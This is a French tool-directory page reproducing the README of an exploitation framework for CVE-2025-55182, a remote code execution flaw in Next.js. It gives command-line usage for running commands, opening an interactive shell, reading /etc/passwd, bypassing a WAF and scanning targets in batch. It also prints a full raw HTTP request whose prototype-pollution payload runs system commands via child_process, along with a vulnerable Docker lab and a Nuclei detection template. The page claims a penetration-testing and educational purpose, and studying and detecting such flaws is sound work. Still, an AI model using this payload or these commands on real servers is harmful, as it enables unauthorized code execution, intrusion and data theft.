Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react2shell-exploit — React2Shell-Exploit — Framework d'exploitation complet pour CVE-2025-55182, incluant un exploit Python, un lab vulnérable Docker, une exploitation manuelle et automatisée via Burp Suite, un template de détection Nuclei, et un flux de travail de test validé. Développé pour les tests d'intrusion et la recherche pédagogique. | Kitploit
Outils/GitHubGitHub/rubensuxo-eh/react2shell-exploit
Scanners de VulnérabilitésFrameworks d'ExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

Voir le dépôt
41il y a 8 moisPas encore vérifié

À propos

React2Shell-Exploit — Framework d'exploitation complet pour CVE-2025-55182, incluant un exploit Python, un lab vulnérable Docker, une exploitation manuelle et automatisée via Burp Suite, un template de détection Nuclei, et un flux de travail de test validé. Développé pour les tests d'intrusion et la recherche pédagogique.

Partager

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE Exécution de code à distance

Framework d'exploitation + laboratoire vulnérable + validation Burp Suite & Nuclei.

Framework d'exploitation complet et environnement de laboratoire vulnérable pour la recherche en sécurité et les tests d'intrusion.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 Vue d'ensemble

React2Shell-Exploit-Kensei est une boîte à outils complète pour exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance dans les applications Next.js.

Elle comprend :

  • 🐍 Exploit Python (modes automatisé et manuel)
  • 🐳 Laboratoire vulnérable Docker (Next.js 16.0.6)
  • 🔥 Modèles d'exploitation Burp Suite
  • 🚨 Modèle de détection Nuclei
  • 🧪 Cas de test validés

Versions affectées :

  • Next.js < 16.0.7
  • React 19.0.0

Score CVSS : 10.0 (Critique)

✨ Fonctionnalités

🔨 Exploitation

✅ Exploitation automatisée ✅ Shell interactif ✅ Exécution de commandes ✅ Lecture de fichiers ✅ Contournement WAF ✅ Analyse par lots

🧪 Laboratoire — Installation Docker - Prérequis

Vous devez avoir Docker installé pour exécuter le laboratoire vulnérable.

PlateformeLien d'installation
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linux

Vérifier l'installation :

root@kitploit:~
docker --version

📖 Documentation

✅ Guide Burp Suite ✅ Modèle Nuclei ✅ Exemples complets


🚀 Démarrage rapide

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 Exemples d'utilisation

Scan

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

Exécuter une commande

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

Shell interactif

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

Lire un fichier

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

Contournement WAF

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

Analyse par lots

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 Exploitation manuelle

Burp Suite

Vérifié fonctionnel — Modèle de requête :

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Réponse attendue :

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

Test manuel de WHOAMI : My Screenshot

Test manuel d'IFCONFIG : My Screenshot

Méthodes alternatives de détection automatisée :

  • ✅ Extension Extensibility Helper :
    1. Allez dans Extensions :
    2. Installez « Extensibility Helper » et ouvrez-la

My Screenshot

  1. Allez dans « Bambda Store »
  2. Cherchez « CVE-2025-55182,CVE-2025-66478 - React2Shell »

My Screenshot

  1. Cliquez sur « import »

My Screenshot

  1. Lancez une « Audit Selected Items »

My Screenshot

My Screenshot

My Screenshot

  1. Validez dans l'onglet Custom que « CVE-2025-55182,CVE-2025-66478 - React2Shell » est coché My Screenshot
  • ✅ ActiveScan++ : Détection automatisée

My Screenshot

Nuclei

Vérifié fonctionnel :

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

Sortie :

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

My Screenshot

🐺 Crédits

Auteur : Ruben Suxo - Ethical Hacker (kensei) Version : 2.5.0 Date : 2025-12-06

Recherche et inspiration

Ce projet s'appuie sur la recherche et les techniques de :

  • assetnote/react2shell-scanner - Implémentation du scanner
  • freeqaz/react2shell - Techniques d'exploitation
  • whiteov3rflow/CVE-2025-55182-poc - Preuve de concept

Découverte de la vulnérabilité

  • Lachlan Davidson (@lachlan2k) - Découverte originale de CVE-2025-55182

⚠️ Avertissement légal

Pour des tests de sécurité autorisés uniquement.

L'accès non autorisé est illégal. Utilisez ceci uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.


📄 Licence

Licence MIT


🐺 Hack The Planet - De manière responsable

À des fins éducatives uniquement. Utilisez éthiquement.

Télécharger l’outil
https://docs.docker.com/engine/install/